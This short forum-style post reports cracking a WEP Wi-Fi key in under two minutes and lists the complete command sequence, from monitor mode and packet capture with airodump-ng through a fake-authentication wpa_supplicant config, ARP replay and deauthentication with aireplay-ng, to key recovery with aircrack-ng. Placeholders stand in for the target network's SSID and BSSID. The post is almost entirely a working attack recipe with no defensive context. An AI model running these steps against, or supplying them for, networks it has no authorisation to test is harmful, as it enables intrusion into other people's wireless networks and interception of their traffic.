
it worked finally!!
I"v tried a lot of different ways, today finally a solution.
I was able to crack my capture arp's and crack my WEP in under 2min's!
This is what I did:
/dev/init.d/networking start
startx
airmon-ng start wlan0
airodump-ng mon0
ctrl+c
airodump-ng -c 'AP Channel' -w 'filename' --bssid 'AP bssid' mon0
make a file in the root (destkop) fake.conf:
network={
ssid="SSID" <-- change this in your target ssid
key_mgmt=NONE
wep_key0="fakeauth"
}
wpa_supplicant -c fake.conf -i wlan0 -Dwext -B
aireplay-ng -3 -b 'AP bssid' mon0
aireplay-ng -0 1 -a 'AP bssid' mon0
aircrack-ng -b BSSID capfile-01.cap
DONE
